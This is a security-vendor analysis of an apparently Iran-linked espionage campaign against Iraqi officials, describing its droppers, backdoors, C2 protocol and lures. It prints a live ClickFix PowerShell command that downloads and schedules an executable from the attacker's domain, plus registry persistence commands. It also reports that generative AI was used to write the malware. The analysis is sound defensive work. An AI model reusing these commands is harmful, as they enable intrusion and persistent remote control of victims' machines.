Dust Specter APT Targets Government Officials in Iraq

Introduction

In January 2026, Zscaler ThreatLabz observed activity by a suspected Iran-nexus threat actor targeting government officials in Iraq. ThreatLabz discovered previously undocumented malware including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. 

Due to significant overlap in tools, techniques, and procedures (TTPs), as well as victimology, between this campaign and activity associated with Iran-nexus APT groups, ThreatLabz assesses with medium-to-high confidence that an Iran-nexus threat actor conducted this operation. ThreatLabz tracks this group internally as Dust Specter. As additional high-confidence indicators become available, ThreatLabz will update our attribution accordingly.

In this blog post, ThreatLabz examines the technical details of two attack chains: Attack Chain 1, which involves the newly identified SPLITDROP dropper and the TWINTASK and TWINTALK backdoors, and Attack Chain 2, which involves the GHOSTFORM remote access trojan (RAT).

Key Takeaways

• In January 2026, ThreatLabz observed activity by a suspected Iran-nexus threat actor, tracked as Dust Specter, targeting government officials in Iraq by impersonating Iraq’s Ministry of Foreign Affairs.
• Iraq government–related infrastructure was compromised and used to host malicious payloads distributed as part of this campaign.
• Dust Specter used randomly generated URI paths for command-and-control (C2) communication with checksum values appended to the URI paths to ensure that these requests originated from an actual infected system. The C2 server also utilized geofencing techniques and User-Agent verification.
• ThreatLabz observed several fingerprints in the codebase indicating that Dust Specter leveraged generative AI for malware development.
• ThreatLabz identified two attack chains with different previously undocumented malware tooling.
• The first attack chain includes SPLITDROP, a .NET-based dropper that drops TWINTASK and TWINTALK to continue the next stage of the attack.
• The second attack chain uses GHOSTFORM, a .NET-based RAT that consolidates all the functionality of the first attack chain into one binary and uses in-memory PowerShell script execution.
• GHOSTFORM uses creative evasion techniques such as invisible Windows forms along with timers to delay its own execution.
• ThreatLabz attributes this campaign to Dust Specter with moderate confidence, based on the code, victimology, and TTP overlaps.

Technical Analysis

The following sections cover Attack Chain 1 and Attack Chain 2, which ThreatLabz observed in-the-wild during this campaign. Attack Chain 1 uses a split architecture with two components, a worker module (TWINTASK) and a C2 orchestrator (TWINTALK), that coordinate through a file-based polling mechanism. Attack Chain 2 consolidates the same functionality into a single binary (GHOSTFORM).

Attack Chain 1

Attack Chain 1 is delivered in a password-protected RAR archive named mofa-Network-code.rar. The password for this archive is: 92,110-135_118-128. A 32-bit .NET binary, disguised as a WinRAR application, is present inside this archive and starts the attack chain on the endpoint. This binary functions as a dropper and ThreatLabz named it SPLITDROP because it drops two modules that we named TWINTASK and TWINTALK. 

SPLITDROP

Upon being launched, SPLITDROP displays a dialog box prompting the victim to enter a password to extract an archive file. SPLITDROP checks for the presence of C:\ProgramData\PolGuid.zip; if the file already exists, SPLITDROP does not continue execution. If the file does not exist and the correct password is entered in the password form, SPLITDROP proceeds to decrypt an embedded resource named CheckFopil.PolGuid.zip. Before decrypting the resource, SPLITDROP displays a message box stating, “The download did not complete successfully,” to distract the victim while it operates in the background.

Because the embedded resource is encrypted using AES-256 in CBC mode with PKCS7 padding, SPLITDROP derives the salt, initialization vector (IV), and ciphertext as follows: 

• the first 16 bytes of the embedded resource are used as the salt,
• the next 16 bytes are used as the IV,
• and the remaining bytes are the ciphertext.

A key derivation function (KDF) is then used to derive the encryption key from the password entered by the victim in the password form. The KDF uses PBKDF2 with HMAC-SHA1 as the pseudorandom function, 10,000 iterations, and a 256-bit key size. The decrypted resource is written to the archive file at C:\programData\PolGuid.zip, and the contents of the ZIP archive are extracted to C:\programData\PolGuid\.

The figure below shows the directory structure after extraction.

Figure 1: Contents of C:\programData\PolGuid\ after extraction.

Finally, a legitimate VLC.exe (the popular open source media player) binary is executed from C:\programData\PolGuid\VLC\VLC.exe to continue to the next stage of the attack chain.

TWINTASK

Upon being launched, VLC.exe sideloads the malicious DLL libvlc.dll which was extracted alongside VLC.exe in the same directory by SPLITDROP. ThreatLabz named this malicious component TWINTASK. 

TWINTASK functions as a worker module, and its main purpose is to poll a file for new commands available for execution and run them using PowerShell. TWINTASK enters an infinite loop and performs the following actions every 15 seconds: 

• It polls C:\ProgramData\PolGuid\in.txt to determine whether the file is empty.
• If the file is empty, TWINTASK continues monitoring the contents every 15 seconds until data is present.
• If the file is not empty, TWINTASK reads the file contents and Base64-decodes them while skipping the first character of the text (which appears to have no significance other than to break naive Base64-decoding attempts), then instantiates PowerShell to execute the decoded script asynchronously with a 600-second timeout. 

TWINTASK captures the script output and any errors in C:\ProgramData\PolGuid\out.txt.

Persistence and C2 orchestrator launch

When TWINTASK is launched, in.txt comes prepopulated with commands that are used to establish persistence on the machine and initiate the next stage of the attack chain. Below are the initial decoded contents of in.txt.

"C:\ProgramData\PolGuid\WingetUI\WingetUI.exe";New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'VLC' -Value 'C:\ProgramData\PolGuid\VLC\vlc.exe' -PropertyType String;New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WingetUI' -Value 'C:\ProgramData\PolGuid\WingetUI\WingetUI.exe' -PropertyType String;

Below are the key functions of the PowerShell script that TWINTASK runs on first launch:

• Executes the binary WingetUI.exe from C:\ProgramData\PolGuid\WingetUI\WingetUI.exe.
• Creates the Windows registry name VLC under the key HKCU:\Software\Microsoft\Windows\CurrentVersion\Run for persistence and sets the value to C:\ProgramData\PolGuid\VLC\vlc.exe to ensure vlc.exe is launched upon system restart and thereby sideloads the malicious DLL, libvlc.dll, to start TWINTASK.
• Creates the Windows registry name WingetUI under the key HKCU:\Software\Microsoft\Windows\CurrentVersion\Run and sets the value to C:\ProgramData\PolGuid\WingetUI\WingetUI.exe to ensure that the binary WingetUI.exe is launched upon system restart.

TWINTALK

Once WingetUI.exe (a legitimate graphical interface application for package managers) is launched by the worker module, it sideloads the malicious DLL hostfxr.dll that is present alongside WingetUI.exe in the same directory. ThreatLabz named this malicious component TWINTALK.

TWINTALK is a 32-bit .NET DLL and functions as a C2 orchestrator whose main purpose is to poll the C2 server for new commands, coordinate with the worker module, and exfiltrate the results of command execution to the C2 server. The C2 orchestrator works in parallel with the previously described worker module to implement a file-based polling mechanism used for code execution.

Upon execution, TWINTALK enters a beaconing loop and delays execution by a random interval before polling the C2 server for new commands. It uses a preconfigured base delay of 120 seconds with jitter that randomizes the delay by generating a random number between -10% and +50% of the base delay (108 seconds to 180 seconds). To implement the delay, TWINTALK creates a nonsignaled unnamed event object using CreateEvent and calls WaitForSingleObject with the randomized delay value calculated above. If the event object cannot be created, TWINTALK falls back to Thread.Sleep() to create the delay. TWINTALK then sends a GET request to the C2 server with the parameters listed in the table below.

Table 1: Description of HTTP request headers and URI format used by TWINTALK.

{"iat": ,"version": }

TWINTALK generates a bot ID by checking for the presence of programTemp.log in its execution directory. If the file exists, TWINTALK reads its contents and uses that value to populate the JWT iat field. If the file does not exist, TWINTALK generates a unique random 10-digit ID at runtime, writes it to programTemp.log, and sends it in the JWT iat field. Note that in the TWINTALK samples analyzed by ThreatLabz, the bot version has been set to 0.0.0.0.

Notably, the iat field in a standard JWT represents a Unix epoch timestamp. By storing a 10-digit, randomly generated bot ID in the iat field, the malware can make the request appear more legitimate. The JWT is signed using the HS256 algorithm with a very weak secret (an "_" character).

Network communication

TWINTALK deserializes a cleartext JSON object returned by the server to extract C2 commands. Notably, it parses fields by position rather than by JSON key name. During analysis, the server was observed randomizing JSON key names on each response, an evasion method intended to evade pattern-matching–based detection used by network security products. The table below summarizes how TWINTALK maps positional fields.

Table 2: Mapping between JSON key positions and their functionality for TWINTALK.

TWINTALK supports the following command types.

• Command execution (type 0): TWINTALK writes the command body from the C2 response to in.txt. The TWINTASK process polls in.txt every 15 seconds, reads and decodes the contents, and executes the resulting PowerShell script. The in.txt file is then truncated. TWINTALK checks in.txt every 20 seconds; an empty in.txt indicates the task was processed. The stager then reads out.txt and sends the results back to the C2.

• File download (type 1): TWINTALK decodes the command body to obtain the destination file path. It then uses the transaction ID to build the download URL: 

  {c2_server}/{10-hex-chars+checksum}/{transaction_id}

  TWINTALK downloads the file from this URL, decodes it, and writes it to the specified path.

• File upload (type 2): TWINTALK parses and decodes the command body to extract a local file path, then constructs an upload URL that is identical to type 1. It reads the local file, Base64-encodes it, prepends one randomly generated character, and sends the data in a POST request to the constructed URL.

Attack Chain 2 (GHOSTFORM)

Attack Chain 2 consolidates all the functionality of Attack Chain 1 into a single binary. It uses in-memory PowerShell script execution to execute the commands received from the C2 server, reducing the filesystem footprint. Unlike Attack Chain 1, a split architecture with DLL sideloading is not used. ThreatLabz named the second attack chain GHOSTFORM based on its usage of an invisible Windows form for delayed execution and its use of Google Forms as a social engineering lure.

Below are the key differences between Attack Chain 1 and Attack Chain 2.  

• Decoy file: Two GHOSTFORM binaries had a hardcoded Google Form URL. Upon launch, the binaries opened the URL with the default browser configured on the victim’s system. The Google Form shown in the figure below is written in Arabic and masquerades as an official survey from Iraq’s Ministry of Foreign Affairs, purportedly intended for government officials.

Figure 2: Google Form displayed by GHOSTFORM to the victim as a social engineering lure.

• Delayed execution: Similar to TWINTALK, GHOSTFORM also enters a C2 beaconing loop that uses a randomized delay function. However, GHOSTFORM uses a more creative delayed execution technique without relying on Windows APIs:
  • Uses a pre-configured base delay of 121 seconds.
  • Jitter randomizes the delay to +35% and -35% of the base delay.
  • Launches an invisible Windows form application.
  • Sets the opacity of the form to 0.001 with a size of 10x15 and sets the ShowInTaskBar property to false so the form does not appear in the Windows task bar.
  • Sets both the form's background color and the label's text color to white.
  • Starts a timer and sets the interval to the delay calculated previously. Once the timer interval elapses, GHOSTFORM closes the form and control is returned to the main malware loop to continue the execution.
• Mutex: Creates a mutex with the name Global\_ to ensure that only one instance of GHOSTFORM runs at any given time.
• Bot ID generation: Unlike Attack Chain 1, the bot ID in GHOSTFORM is not generated randomly. Instead, GHOSTFORM converts the .NET assembly’s creation timestamp to a Unix epoch timestamp and uses that as the bot ID.
• Bot version: Below are a few bot versions observed across samples of GHOSTFORM. Unlike TWINTALK, the bot versions are not set to 0.0.0.0
  • 5.62.147.912_1
  • 3.3.28.962_1

NOTE: The nature of the bot version numbers seems to indicate that they were generated randomly and a meaningful versioning scheme was not used.

Use of Generative AI for Malware Development

During the decompilation of TWINTALK and GHOSTFORM, ThreatLabz identified the use of emojis and unicode text in the codebase. This unusual coding style strongly suggests that generative AI tools were utilized during the malware's development, and is a trend documented in other campaigns.

Below is the code used to truncate the data sent in the POST request, which includes emojis.

private string set_in_measure(string data)
{
int num = 900000;
if (data == null)
{
this.is_error = true;
return "⚠️";
}
if (num >= data.Length)
{
return data;
}
return "🗣️\n\n" + data.Substring(0, num);
}

Below is the code used to generate a 6-character checksum from the randomly generated 10-character string used to construct the URI path. The seed value 11259375 (0xABCDEF) appears to be a placeholder commonly found in code generated by AI.

ClickFix Attack

ThreatLabz found that the TWINTALK C2 domain, meetingapp[.]site, was also used by Dust Specter in July 2025 to host a web page disguised as a Cisco Webex meeting invitation. The web page included a link to download the legitimate Cisco Webex software and prompted the victim to choose the “Webex for Government” option. The web page also lures the victim into following the instructions shown in the figure below to retrieve the meeting ID.

Figure 3: Example ClickFix social engineering lure used by Dust Specter.

These instructions are a typical social engineering method employed by threat actors to implement ClickFix-style attacks. Below is the PowerShell command provided on the web page.

$di='C:\ProgramData\WinWebex';md $di 2>"";$path=$di+'\WinWebex.exe';Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0');[IO.File]::WriteAllBytes($path, $c.GetAsync('https://meetingapp.site/webexdownload').Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;

The PowerShell command will:

• Create the directory C:\ProgramData\WinWebex.
• Send a GET request to hxxps://meetingapp[.]site/webexdownload with the User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0 to download the malicious binary to the path C:\ProgramData\WinWebex\WinWebex.exe.
• Create a scheduled task with the name winWebex set to launch every 2 hours to execute the malicious binary in the location C:\ProgramData\WinWebex\WinWebex.exe.

At the time of analysis, ThreatLabz was not able to retrieve the malicious binary from the hxxps://meetingapp[.]site/webexdownload URL.

Threat Attribution

ThreatLabz attributes this campaign to Dust Specter with moderate confidence, based on the code, victimology, and TTP overlaps described below.

• Victimology: Iraq’s government sector, particularly the Ministry of Foreign Affairs, has been targeted in the past by Iran-nexus threat actors such as APT34. In this campaign, the social engineering lures and archive filenames strongly suggest the intended targets are government officials within, or affiliated with, Iraq’s Ministry of Foreign Affairs.
• Tooling: The following tooling observations are consistent with Iran-nexus threat actors.
  • The use of custom lightweight .NET backdoors with no code obfuscation are a hallmark feature of several Iran-linked APT groups.
  • The use of only three C2 commands, code execution, file download, and file upload, was consistently observed across multiple custom .NET malware families used by Iran-linked APT groups such as APT34.
  • While not unique to APT34, Iran-nexus threat actors have been observed smuggling C2 commands and victim identifiers inside HTTP headers in C2 communications. In this campaign, ThreatLabz observed the bot ID and bot version being sent inside the iat field of the JWT in the HTTP request headers.
  • Using compromised Iraqi government infrastructure for malicious operations is a tactic previously used by Iran-linked APT groups such as APT34, including in 2024. In this campaign, the legitimate Iraqi government website ca.iq was compromised and used to host the malicious archive containing GHOSTFORM.
• Lures: The following lures align with social engineering techniques used by Iran-nexus threat actors.
  • The use of fake meeting invitations is used by several Iran-linked APT groups. In this case, Dust Specter lured the victim by creating web pages masquerading as Cisco‘s “Webex for Government” meeting invite.
  • While the ClickFix social engineering technique is not unique to Iran-linked APT groups, Dust Specter incorporated ClickFix into their arsenal in the recent past.
• Generative AI for malware development: Generative AI has been quickly adapted by several threat actors and recent reports from AI vendors indicate that Iran-linked APT groups have integrated AI in their attack lifecycle.

Conclusion

This campaign, attributed with medium-to-high confidence to Dust Specter, likely targeted government officials using convincing social engineering lures impersonating Iraq’s Ministry of Foreign Affairs. ThreatLabz identified previously undocumented lightweight custom .NET-based droppers and backdoors used in this operation. The activity also reflects broader trends, including ClickFix-style techniques and the growing use of generative AI for malware development.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to this campaign at various levels.

• Win32.Dropper.SPLITDROP
• Win32.Trojan.TWINTASK
• Win32.Backdoor.TWINTALK
• Win32.RAT.GHOSTFORM

Indicators Of Compromise (IOCs)

File indicators

Network indicators

MITRE ATT&CK Framework